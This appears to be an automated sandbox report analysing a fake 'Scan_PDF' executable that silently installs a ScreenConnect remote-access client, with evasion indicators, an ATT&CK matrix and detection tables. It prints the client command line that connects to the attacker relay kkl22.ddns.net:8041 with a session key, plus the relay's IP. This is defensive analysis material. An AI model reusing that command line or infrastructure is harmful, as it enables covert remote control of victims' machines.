                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9390.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI998C.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exe TID: 7404Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe TID: 7812Thread sleep count: 45 > 30Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe TID: 7984Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1345833223.0000000001667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}T@aq
                              Source: setup.msi.0.drBinary or memory string: VMCi-
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.2610667103.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: 0.0.Scan_PDF_2017163298.exe.3cc3d8.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                              Source: 0.0.Scan_PDF_2017163298.exe.3cc3d8.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                              Source: 0.0.Scan_PDF_2017163298.exe.3cc3d8.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                              Source: 0.0.Scan_PDF_2017163298.exe.3cc3d8.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                              Source: 0.0.Scan_PDF_2017163298.exe.3cc3d8.5.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"Jump to behavior
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.clientservice.exe" "?e=access&y=guest&h=kkl22.ddns.net&p=8041&s=478e82c1-db06-42e2-b73b-60fd80c17bc4&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&t=scan_pdf&c=windows%20pdf%20viewer&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c="
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1401154593.00000000001A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Progman
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1401154593.00000000001A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886C55C05 CreateNamedPipeW,9_2_00007FF886C55C05
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_01164D30 RtlGetVersion,8_2_01164D30
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                              Source: Yara matchFile source: Scan_PDF_2017163298.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.2.Scan_PDF_2017163298.exe.5ab0000.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.2.ScreenConnect.WindowsClient.exe.256fa20.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.1a0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 10.2.ScreenConnect.WindowsClient.exe.2b9fa60.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Scan_PDF_2017163298.exe.5ab0000.7.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.Scan_PDF_2017163298.exe.3f5db8.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.Scan_PDF_2017163298.exe.3463d8.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.Scan_PDF_2017163298.exe.3cc3d8.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.Scan_PDF_2017163298.exe.330000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.1365528966.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000000.1401154593.00000000001A2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000002.2588106191.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.1335059252.0000000000346000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000A.00000002.1452815491.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1346358493.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: Scan_PDF_2017163298.exe PID: 7352, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7616, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7832, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7964, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Config.Msi\5096ec.rbs, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI996C.tmp, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Valid Accounts
                              31
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Disable or Modify Tools
                              OS Credential Dumping11
                              Peripheral Device Discovery
                              Remote Services11
                              Archive Collected Data
                              2
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomains1
                              Replication Through Removable Media
                              1
                              Native API
                              1
                              DLL Search Order Hijacking
                              1
                              DLL Search Order Hijacking
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              File and Directory Discovery
                              Remote Desktop ProtocolData from Removable Media1
                              Non-Standard Port
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts12
                              Command and Scripting Interpreter
                              1
                              Valid Accounts
                              1
                              Valid Accounts
                              1
                              Obfuscated Files or Information
                              Security Account Manager45
                              System Information Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron2
                              Windows Service
                              1
                              Access Token Manipulation
                              1
                              DLL Side-Loading
                              NTDS21
                              Security Software Discovery
                              Distributed Component Object ModelInput Capture11
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd1
                              Bootkit
                              2
                              Windows Service
                              1
                              DLL Search Order Hijacking
                              LSA Secrets2
                              Process Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts13
                              Process Injection
                              1
                              File Deletion
                              Cached Domain Credentials51
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items122
                              Masquerading
                              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              Valid Accounts
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                              Access Token Manipulation
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron51
                              Virtualization/Sandbox Evasion
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd13
                              Process Injection
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                              Hidden Users
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Bootkit
                              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                              Rundll32
                              Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523870 Sample: Scan_PDF_2017163298.exe Startdate: 02/10/2024 Architecture: WINDOWS Score: 42 57 kkl22.ddns.net 2->57 63 .NET source code references suspicious native API functions 2->63 65 Contains functionality to hide user accounts 2->65 67 Initial sample is a PE file and has a suspicious name 2->67 71 2 other signatures 2->71 8 msiexec.exe 94 51 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 Scan_PDF_2017163298.exe 5 2->15         started        17 svchost.exe 2->17         started        signatures3 69 Uses dynamic DNS services 57->69 process4 dnsIp5 45 C:\...\ScreenConnect.WindowsClient.exe, PE32 8->45 dropped 47 C:\...\ScreenConnect.ClientService.exe, PE32 8->47 dropped 49 C:\...\ScreenConnect.WindowsClient.exe.config, XML 8->49 dropped 53 10 other files (none is malicious) 8->53 dropped 73 Enables network access during safeboot for specific services 8->73 75 Modifies security policies related information 8->75 19 msiexec.exe 8->19         started        21 msiexec.exe 1 8->21         started        23 msiexec.exe 8->23         started        59 kkl22.ddns.net 188.119.113.59, 49707, 8041 SERVERIUS-ASNL Russian Federation 12->59 77 Reads the Security eventlog 12->77 79 Reads the System eventlog 12->79 25 ScreenConnect.WindowsClient.exe 3 12->25         started        28 ScreenConnect.WindowsClient.exe 2 12->28         started        51 C:\Users\user\...\Scan_PDF_2017163298.exe.log, ASCII 15->51 dropped 81 Contains functionality to hide user accounts 15->81 30 msiexec.exe 6 15->30         started        file6 signatures7 process8 file9 33 rundll32.exe 11 19->33         started        83 Creates files in the system32 config directory 25->83 85 Contains functionality to hide user accounts 25->85 55 C:\Users\user\AppData\Local\...\MSI9390.tmp, PE32 30->55 dropped signatures10 process11 file12 37 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 33->37 dropped 39 C:\...\ScreenConnect.InstallerActions.dll, PE32 33->39 dropped 41 C:\Users\user\...\ScreenConnect.Core.dll, PE32 33->41 dropped 43 4 other files (none is malicious) 33->43 dropped 61 Contains functionality to hide user accounts 33->61 signatures13

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe3%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI9390.tmp0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI9390.tmp0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.Compression.Cab.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.Compression.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\ScreenConnect.Core.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\ScreenConnect.InstallerActions.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI9390.tmp-\ScreenConnect.Windows.dll0%VirustotalBrowse
                              C:\Windows\Installer\MSI998C.tmp0%ReversingLabs
                              C:\Windows\Installer\MSI998C.tmp0%VirustotalBrowse
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              kkl22.ddns.net0%VirustotalBrowse
                              SourceDetectionScannerLabelLink
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                              http://wixtoolset.org/releases/0%VirustotalBrowse
                              https://feedback.screenconnect.com/Feedback.axd0%VirustotalBrowse
                              https://docs.rs/getrandom#nodejs-es-module-support0%VirustotalBrowse
                              http://wixtoolset.org/news/0%VirustotalBrowse
                              http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v0%VirustotalBrowse
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              kkl22.ddns.net
                              188.119.113.59
                              truetrueunknown
                              NameSourceMaliciousAntivirus DetectionReputation
